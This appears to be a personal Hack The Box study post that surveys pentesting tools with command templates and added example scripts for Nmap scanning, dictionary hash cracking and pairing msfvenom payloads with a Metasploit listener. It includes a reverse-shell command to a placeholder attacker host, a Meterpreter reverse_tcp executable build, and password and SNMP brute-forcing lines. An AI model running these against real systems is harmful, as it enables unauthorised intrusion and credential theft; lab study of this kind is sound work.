My Hack The Box Toolkit
During my HTB studies, I’ve already tried out numerous tools, and I expect to discover many more in the future. Below is a list of these tools, followed by a detailed explanation of each, with examples and useful command templates.
Tool List
Nmap – port scanning and service enumeration, a fundamental tool for network reconnaissance.
Ncat – network communication and reverse shell creation; helps connect to remote systems.
John the Ripper – cracking hashed passwords, particularly useful for wordlists and hash files.
Hashcat – GPU-accelerated password cracking, suitable for large hash files and complex passwords.
Gobuster – brute-force discovery of web directories and files, useful for mapping web applications.
ZAP – web vulnerability scanning, fuzzer, and proxy tool for automated security testing.
Burp Suite – web application security testing, HTTP request manipulation, and scanner execution.
Whois – querying domain information such as owner, registrar, and expiration date.
Dig – DNS queries and troubleshooting, quickly checks DNS records.
Dnsenum – DNS enumeration and domain discovery, exploring subdomains and name resolutions.
Curl – testing HTTP/HTTPS requests and API calls from the command line.
Smbclient – managing SMB/CIFS network shares, uploading and downloading files over the network.
Snmpwalk – gathering SNMP information from network devices for configuration and device data analysis.
Onesixtyone – SNMP brute-force attacks to discover unknown community strings.
Metasploit Framework (msf) – full-featured pentesting framework with exploit, auxiliary and post-exploitation modules plus the handlers that catch reverse payloads.
Msfvenom – generating payloads and preparing exploits for different platforms and protocols.
Detailed Explanation and Useful Command Templates
Nmap Nmap is the foundation of network reconnaissance. It allows you to quickly see which ports are open, which services are running, and what software versions are installed on the target system. Basic scan:
nmap -sC -sV -oN scan.txt 10.10.10.10
Tips: Without -p the scan covers only the 1000 most common ports, so follow up with -p- for all 65535; -O adds operating system fingerprinting and -oA saves all three output formats at once.
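The scan above is the second half of the workflow most HTB boxes need: a fast sweep of every port first, then scripts and version probes only against the ports that are actually open. The following script is an added example, not a command from the original post; it assumes nmap is installed and that the target is a lab host you are allowed to scan, and it parses Nmap's grepable (-oG) output format to carry the open ports from phase one into phase two.

```shell
#!/bin/sh
# Added example, not from the original post: two-phase Nmap workflow.
# Phase 1 sweeps all 65535 TCP ports with grepable output (-oG);
# phase 2 runs -sC -sV only against the ports found open.
# Assumes nmap is installed and "$1" is a lab target you may scan.

# open_ports_from_grepable <file.gnmap>
# Print the open TCP ports from an Nmap grepable file as "22,80,445".
open_ports_from_grepable() {
    # A -oG host line looks like:
    #   Host: 10.10.10.10 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
    grep 'Ports:' "$1" \
      | sed 's/.*Ports: //' \
      | tr ',' '\n' \
      | awk -F/ '$2 == "open" { p = p (length(p) ? "," : "") ($1 + 0) }
                 END { print p }'
}

# two_phase_scan <target>
two_phase_scan() {
    target="$1"
    # Phase 1: every port, no scripts, no version probes (fast).
    nmap -p- --min-rate 1000 -oG "all_ports_${target}.gnmap" "$target" >/dev/null
    ports="$(open_ports_from_grepable "all_ports_${target}.gnmap")"
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    # Phase 2: default scripts and version detection on the open ports only.
    nmap -sC -sV -p "$ports" -oN "scan_${target}.txt" "$target"
}

# Usage: two_phase_scan 10.10.10.10
```

The parser only keeps entries whose state field is "open", so filtered and closed ports never reach the -sC -sV run; --min-rate 1000 is fine on the HTB lab network but should be lowered against anything fragile.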
Ncat Ncat enables network communication and creating reverse shells, which is useful in penetration testing when testing remote access. In a reverse shell the target connects back to you, so the listener runs on the attacking machine. Listener (attacker) side:
ncat -lvnp 4444
On the target, connecting back to the listener and attaching a shell (attacker_ip is the machine running the listener):
ncat attacker_ip 4444 -e /bin/bash
Tips: -l listens, -v is verbose, -n skips DNS lookups and -p sets the port. -e only works with an ncat build that has exec support; when it is available on both ends, --ssl encrypts the channel. Ncat can be easily combined with other tools for network testing.
John the Ripper John specializes in cracking password hashes. It auto-detects most hash formats and tries each candidate from a wordlist, optionally mutated by rules. Cracking a hash:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Tips: Pass --format=<type> when auto-detection picks the wrong format and --rules to apply mangling rules; john --show hash.txt prints the cracked passwords (they are stored in the potfile, so re-running on the same hash prints nothing new). Fast for small hash files; use Hashcat for large sets.
Hashcat Hashcat uses GPU acceleration to crack large hash files efficiently. Dictionary (straight) attack against MD5 hashes:
hashcat -m 0 -a 0 hash.txt rockyou.txt
Tips: -m selects the hash type (0 = MD5, 1000 = NTLM, 1800 = sha512crypt; hashcat --help lists them all) and -a the attack mode: 0 is a dictionary attack, 3 is mask-based brute force (e.g. -a 3 '?u?l?l?l?d?d'). -r rules/best64.rule mutates every wordlist entry, and hashcat -m 0 --show hash.txt prints what has already been cracked from the potfile.
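Both the John and the Hashcat commands above are dictionary attacks: every word in the list is hashed and compared with the target. The script below is an added example, not from the original post, that does the same thing in plain shell for MD5 so the mechanism is visible, including the detail that trips people up when they build test hashes by hand: the word is hashed without a trailing newline. It assumes md5sum from coreutils; the wordlist and hash are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: the mechanism behind
# "hashcat -a 0" and "john --wordlist", in plain shell for MD5.
# Assumes md5sum (coreutils). Real tools add GPU/CPU optimisation,
# rules and hundreds of hash formats; the loop is the same idea.

# dict_crack <md5-hex> <wordlist>
# Print the word whose MD5 matches, or return 1 if none does.
dict_crack() {
    target="$(printf '%s' "$1" | tr 'A-F' 'a-f')"   # hashcat hex is lowercase
    while IFS= read -r word || [ -n "$word" ]; do    # handle a missing final newline
        # printf without '\n': "echo password | md5sum" would hash "password\n"
        # and never match the hash of "password".
        h="$(printf '%s' "$word" | md5sum | cut -d' ' -f1)"
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# make_demo_wordlist <file>: constructed wordlist for the demo, not HTB data.
make_demo_wordlist() {
    printf '%s\n' letmein Password1 password qwerty > "$1"
}

# Usage:
#   make_demo_wordlist /tmp/words.txt
#   dict_crack 5f4dcc3b5aa765d61d8327deb882cf99 /tmp/words.txt   # -> password
```

With rockyou.txt (14 million lines) this shell loop would take hours where Hashcat takes seconds, which is the whole reason to reach for the real tools; what they do not change is the need for the -m value to match the hash type, otherwise nothing will ever match no matter how good the wordlist is.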
Gobuster Gobuster allows brute-force discovery of web directories and files. Useful for mapping the structure of web applications. Discovering web directories:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Tips: -x php,txt appends file extensions to every word, -b and -s blacklist or whitelist HTTP status codes, and -t raises the thread count. Try several wordlists; a directory list and a file list find different things.
ZAP OWASP Zed Attack Proxy (ZAP) enables scanning for web vulnerabilities, proxying requests, and automated fuzzing of target applications. Tips: Running automated scans and configuring custom fuzzers is very useful in practice.
Burp Suite Burp Suite is a professional web application testing tool that allows intercepting and modifying HTTP requests, scanning for vulnerabilities, and automating tests. Tips: Intercept mode allows request modification, while the repeater function helps test exploits.
Whois / Dig / Dnsenum These tools are used for inspecting domains and DNS records. They help gather information about a target domain and its subdomains.
whois example.com
dig example.com A
dnsenum example.com
Tips: Useful for reconnaissance during web application mapping.
Curl Curl allows testing HTTP/HTTPS requests from the command line, ideal for quickly checking APIs and websites. HTTP request:
curl -X GET http://10.10.10.10/page
Tips: -X GET is the default and can be omitted; -i prints the response headers, -s silences the progress meter, -k skips certificate verification, -H adds a header and -d sends a POST body. Easily integrates into scripts and automated tests.
Smbclient Used for accessing SMB shares and managing files. Ideal for mapping Windows-based networks.
smbclient //10.10.10.10/share -U username
Tips: smbclient -L //10.10.10.10 -N lists the available shares with a null session; inside a share, get and put transfer files, and which of them fail tells you what permissions the account has.
Snmpwalk / Onesixtyone SNMP allows gathering information from network devices. Onesixtyone enables brute-force attacks if the community string is unknown.
snmpwalk -v2c -c public 10.10.10.10
onesixtyone -c community_list.txt 10.10.10.0/24
Tips: public and private are the default community strings worth trying first. A successful walk often reveals running processes, installed software, usernames and interface details; fall back to -v1 if v2c gets no reply.
Metasploit (msf / msfvenom) Metasploit is a framework of exploit, auxiliary and post-exploitation modules for many platforms. Msfvenom generates payloads for target systems. Starting the console:
msfconsole
Generating a payload (LHOST and LPORT are the attacker's listening address, not the target's):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > shell.exe
Tips: Metasploit modules allow quick testing, while msfvenom creates custom payloads. A reverse payload only works with a matching listener: exploit/multi/handler with the same PAYLOAD, LHOST and LPORT must be running before the payload executes.
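Since the payload and its listener have to agree on PAYLOAD, LHOST and LPORT, it is safer to generate both from the same variables than to type them twice. The script below is an added example and not from the original post: it writes a Metasploit resource script for exploit/multi/handler and pairs it with the msfvenom call. It assumes msfvenom and msfconsole are installed; the address 10.10.14.5 is a placeholder for your own VPN address.

```shell
#!/bin/sh
# Added example, not from the original post: msfvenom payload plus the
# matching multi/handler listener, generated from one set of variables.
# Assumes msfvenom/msfconsole are installed. LHOST is *your* address
# (the HTB VPN interface), never the target's.

# write_handler_rc <payload> <lhost> <lport> <outfile>
# Write a Metasploit resource script that starts a background listener.
write_handler_rc() {
    cat > "$4" <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j
EOF
}

# build_and_listen <payload> <lhost> <lport> <format> <outfile>
# Generate the payload, then start the handler that will catch it.
build_and_listen() {
    msfvenom -p "$1" LHOST="$2" LPORT="$3" -f "$4" -o "$5" || return 1
    write_handler_rc "$1" "$2" "$3" handler.rc
    # -q skips the banner, -r runs the resource script on start-up.
    msfconsole -q -r handler.rc
}

# Usage (placeholder attacker address, assumed):
#   build_and_listen windows/meterpreter/reverse_tcp 10.10.14.5 4444 exe shell.exe
```

ExitOnSession false with exploit -j keeps the handler running as a job after the first session arrives, so a second execution of the payload (or a second host) is caught without restarting anything.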
This list is, of course, not exhaustive, as I continue to explore new tools and techniques in my HTB studies. However, it provides a solid foundation to review the knowledge I’ve gained so far and helps guide further practice.